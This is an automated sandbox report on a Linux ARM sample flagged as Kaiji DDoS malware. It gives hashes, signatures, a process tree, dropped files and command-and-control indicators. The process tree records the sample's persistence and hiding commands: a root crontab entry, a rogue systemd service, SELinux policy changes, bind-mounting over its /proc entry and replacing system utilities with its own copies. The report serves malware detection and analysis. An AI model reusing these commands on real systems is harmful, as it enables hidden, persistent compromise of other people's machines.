Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
linux_arm6.elf

Overview

General Information

Sample name:linux_arm6.elf
Analysis ID:1572673
MD5:c5f2dde5dca123520549bd745325fa64
SHA1:2b154bf7d864b50f746348bc93044e8e939dbee1
SHA256:b3f7cb72809a18ea6a45ac6658fac539e2c066184485e041845d2e2f9949125f
Tags:elfuser-abuse_ch
Infos:

Detection

Kaiji
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Kaiji
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Writes identical ELF files to multiple locations
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Drops files with innocent-looking names
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads the 'hosts' file potentially containing internal network hosts
Sample and/or dropped files contains symbols with suspicious names
Sample has stripped symbol table
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1572673
Start date and time:2024-12-10 19:02:25 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:linux_arm6.elf
Detection:MAL
Classification:mal76.spre.troj.evad.linELF@0/77@4/0

Warnings

  • VT rate limit hit for: linux_arm6.elf

Runtime Messages

Command:/tmp/linux_arm6.elf
PID:5483
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • linux_arm6.elf (PID: 5483, Parent: 5409, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/linux_arm6.elf
    • linux_arm6.elf (PID: 5488, Parent: 5483, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/linux_arm6.elf
      • bash (PID: 5501, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32675&
        • bash New Fork (PID: 5506, Parent: 5501)
        • 32675 (PID: 5506, Parent: 2955, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /etc/32675
          • 32675 New Fork (PID: 5509, Parent: 5506)
          • sleep (PID: 5509, Parent: 5506, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • 32675 New Fork (PID: 5723, Parent: 5506)
          • opt.services.cfg (PID: 5723, Parent: 5506, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /etc/opt.services.cfg
            • opt.services.cfg (PID: 5728, Parent: 5723, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /etc/opt.services.cfg
          • 32675 New Fork (PID: 5731, Parent: 5506)
          • sleep (PID: 5731, Parent: 5506, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
      • service (PID: 5507, Parent: 5488, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
        • service New Fork (PID: 5510, Parent: 5507)
        • basename (PID: 5510, Parent: 5507, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5511, Parent: 5507)
        • basename (PID: 5511, Parent: 5507, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5512, Parent: 5507)
        • systemctl (PID: 5512, Parent: 5507, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5513, Parent: 5507)
          • service New Fork (PID: 5514, Parent: 5513)
          • systemctl (PID: 5514, Parent: 5513, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5515, Parent: 5513)
          • sed (PID: 5515, Parent: 5513, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5507, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
      • bash (PID: 5522, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 5528, Parent: 5522)
        • systemctl (PID: 5528, Parent: 5522, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 5532, Parent: 5522)
        • systemctl (PID: 5532, Parent: 5522, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaoff.service
        • bash New Fork (PID: 5538, Parent: 5522)
        • systemctl (PID: 5538, Parent: 5522, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaoff.service
        • bash New Fork (PID: 5560, Parent: 5522)
        • journalctl (PID: 5560, Parent: 5522, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
      • bash (PID: 5575, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
        • bash New Fork (PID: 5580, Parent: 5575)
        • bash New Fork (PID: 5581, Parent: 5575)
        • bash New Fork (PID: 5582, Parent: 5575)
      • bash (PID: 5583, Parent: 5488, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
      • renice (PID: 5613, Parent: 5488, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 5488
      • mount (PID: 5619, Parent: 5488, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5488
      • service (PID: 5645, Parent: 5488, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start
        • service New Fork (PID: 5650, Parent: 5645)
        • basename (PID: 5650, Parent: 5645, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5651, Parent: 5645)
        • basename (PID: 5651, Parent: 5645, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5652, Parent: 5645)
        • systemctl (PID: 5652, Parent: 5645, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5653, Parent: 5645)
          • service New Fork (PID: 5654, Parent: 5653)
          • systemctl (PID: 5654, Parent: 5653, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5655, Parent: 5653)
          • sed (PID: 5655, Parent: 5653, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5645, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service
      • systemctl (PID: 5671, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
  • systemd New Fork (PID: 5530, Parent: 5529)
  • snapd-env-generator (PID: 5530, Parent: 5529, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5536, Parent: 5535)
  • snapd-env-generator (PID: 5536, Parent: 5535, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5539, Parent: 1)
  • System.mod (PID: 5539, Parent: 1, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
    • System.mod (PID: 5555, Parent: 5539, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
  • systemd New Fork (PID: 5566, Parent: 1)
  • System.mod (PID: 5566, Parent: 1, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
    • System.mod (PID: 5571, Parent: 5566, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /boot/System.mod
  • udisksd New Fork (PID: 5632, Parent: 803)
  • dumpe2fs (PID: 5632, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 5670, Parent: 1)
  • cron (PID: 5670, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5688, Parent: 5670)
      • cron New Fork (PID: 5694, Parent: 5688)
      • sh (PID: 5694, Parent: 5688, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 5695, Parent: 5694)
        • .mod (PID: 5695, Parent: 5694, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 5696, Parent: 5695)
          • libgdi.so.0.8.1 (PID: 5696, Parent: 5695, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
            • libgdi.so.0.8.1 (PID: 5701, Parent: 5696, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
  • systemd New Fork (PID: 5716, Parent: 1)
  • cron (PID: 5716, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5758, Parent: 5716)
      • cron New Fork (PID: 5759, Parent: 5758)
      • sh (PID: 5759, Parent: 5758, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 5760, Parent: 5759)
        • .mod (PID: 5760, Parent: 5759, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 5761, Parent: 5760)
          • libgdi.so.0.8.1 (PID: 5761, Parent: 5760, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
            • libgdi.so.0.8.1 (PID: 5766, Parent: 5761, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.1
  • systemd New Fork (PID: 5780, Parent: 1)
  • cron (PID: 5780, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
KaijiSurfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
linux_arm6.elfJoeSecurity_Kaiji_1Yara detected KaijiJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /boot/System.modJoeSecurity_Kaiji_1Yara detected KaijiJoe Security
      /etc/opt.services.cfgJoeSecurity_Kaiji_1Yara detected KaijiJoe Security
        /usr/bin/include/ssJoeSecurity_Kaiji_1Yara detected KaijiJoe Security
          /usr/bin/include/lsJoeSecurity_Kaiji_1Yara detected KaijiJoe Security
            /usr/bin/include/psJoeSecurity_Kaiji_1Yara detected KaijiJoe Security
              Click to see the 7 entries

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: linux_arm6.elfReversingLabs: Detection: 34%
              Source: global trafficTCP traffic: 192.168.2.14:36016 -> 93.123.85.138:60888
              Source: /tmp/linux_arm6.elf (PID: 5488)Reads hosts file: /etc/hostsJump to behavior
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: cc.ava9527.cc
              Source: netstat.14.drELF static info symbol of dropped file: freeaddrinfo
              Source: netstat.14.drELF static info symbol of dropped file: getaddrinfo
              Source: netstat.14.drELF static info symbol of dropped file: getnameinfo
              Source: System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.drString found in binary or memory: http://.css
              Source: System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.drString found in binary or memory: http://.jpg
              Source: System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.drString found in binary or memory: http://html4/loose.dtd
              Source: lsof.14.drString found in binary or memory: https://github.com/lsof-org/lsof
              Source: lsof.14.drString found in binary or memory: https://github.com/lsof-org/lsof/blob/master/00FAQ
              Source: lsof.14.drString found in binary or memory: https://github.com/lsof-org/lsof/blob/master/Lsof.8
              Source: lsof.14.drString found in binary or memory: https://github.com/lsof-org/lsofhttps://github.com/lsof-org/lsof/blob/master/00FAQhttps://github.com
              Source: ls.14.dr, dir.14.drString found in binary or memory: https://gnu.org/licenses/gpl.html
              Source: dir.14.drString found in binary or memory: https://translationproject.org/team/
              Source: ls.14.dr, dir.14.drString found in binary or memory: https://wiki.xiph.org/MIME_Types_and_File_Extensions
              Source: ls.14.dr, dir.14.drString found in binary or memory: https://wiki.xiph.org/MIME_Types_and_File_Extensions.oga
              Source: ls.14.dr, dir.14.drString found in binary or memory: https://wiki.xiph.org/MIME_Types_and_File_Extensions.ogv
              Source: ls.14.dr, dir.14.drString found in binary or memory: https://www.gnu.org/gethelp/
              Source: ls.14.dr, dir.14.drString found in binary or memory: https://www.gnu.org/software/coreutils/
              Source: ls.14.dr, dir.14.drString found in binary or memory: https://www.gnu.org/software/coreutils/Report
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /etc/opt.services.cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /boot/System.modJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /etc/profile.d/bash_cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/lib/libgdi.so.0.8.1Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/lib/system-markJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/bin/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/bin/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/bin/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/bin/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/bin/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/bin/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)HTML file containing JavaScript created: /usr/bin/lsofJump to dropped file
              Source: ss.14.drELF static info symbol of dropped file: mnl_nlmsg_get_payload
              Source: ss.14.drELF static info symbol of dropped file: mnl_nlmsg_get_payload_len
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: classification engineClassification label: mal76.spre.troj.evad.linELF@0/77@4/0
              Source: ELF file sectionSubmission: linux_arm6.elf
              Source: ELF file sectionDropped file: opt.services.cfg.14.dr
              Source: ELF file sectionDropped file: System.mod.14.dr
              Source: ELF file sectionDropped file: bash_cfg.14.dr
              Source: ELF file sectionDropped file: libgdi.so.0.8.1.14.dr
              Source: ELF file sectionDropped file: system-mark.14.dr
              Source: ELF file sectionDropped file: ps0.14.dr
              Source: ELF file sectionDropped file: ss0.14.dr
              Source: ELF file sectionDropped file: ls0.14.dr
              Source: ELF file sectionDropped file: dir0.14.dr
              Source: ELF file sectionDropped file: netstat0.14.dr
              Source: ELF file sectionDropped file: find0.14.dr
              Source: ELF file sectionDropped file: lsof0.14.dr

              Persistence and Installation Behavior

              barindex
              Sample tries to persist itself using /etc/profile
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/profile.d/bash_cfgJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/profile.d/bash_cfg.shJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/profile.d/gateway.shJump to behavior
              Sample tries to persist itself using cron
              Source: /bin/bash (PID: 5583)File: /etc/crontabJump to behavior
              Sample tries to set files in /etc globally writable
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/32675 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Writes identical ELF files to multiple locations
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/lib/system-markJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /etc/opt.services.cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/netstatJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/lsofJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/lsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/findJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/ssJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /etc/profile.d/bash_cfgJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/dirJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/lib/libgdi.so.0.8.1Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /usr/bin/psJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File with SHA-256 B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F written: /boot/System.modJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/.aresJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /dev/.walk.lodJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/.walkJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /etc/.walkJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /dev/.oldJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /dev/.imgJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File: /.modJump to behavior
              Source: /etc/opt.services.cfg (PID: 5728)File: /etc/.aresJump to behavior
              Source: /etc/opt.services.cfg (PID: 5728)File: /etc/.walkJump to behavior
              Source: /etc/opt.services.cfg (PID: 5728)File: /dev/.walk.lodJump to behavior
              Source: /boot/System.mod (PID: 5555)File: /etc/.aresJump to behavior
              Source: /boot/System.mod (PID: 5555)File: /dev/.walk.lodJump to behavior
              Source: /boot/System.mod (PID: 5555)File: /etc/.walkJump to behavior
              Source: /.mod (PID: 5695)Directory: /.modJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701)File: /dev/.walk.lodJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701)File: /etc/.aresJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701)File: /etc/.walkJump to behavior
              Source: /.mod (PID: 5760)Directory: /.modJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766)File: /etc/.aresJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766)File: /etc/.walkJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766)File: /dev/.walk.lodJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)Empty hidden file: /dev/.oldJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766)Empty hidden file: /etc/.aresJump to behavior
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766)Empty hidden file: /dev/.walk.lodJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)Empty hidden file: /dev/.imgJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3760/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3761/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1583/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/2672/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/110/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3759/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/111/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/112/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/113/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/234/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1577/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/114/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/235/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/115/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/116/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/117/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/118/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/119/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/10/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/917/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3758/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/11/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/12/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/13/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/14/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/15/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/16/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/17/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/18/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/19/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1593/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/240/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/120/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3094/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/121/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/242/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3406/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/122/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/243/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/2/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/123/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/244/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1589/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/124/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/245/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/1588/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/125/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/4/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/246/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/3402/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/126/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/5/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/247/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/127/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/6/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/248/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/128/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/7/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/249/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/8/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/129/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/800/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/9/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/801/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/803/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/20/statJump to behavior
              Source: /tmp/linux_arm6.elf (PID: 5488)File opened: /proc/806/statJump to behavior
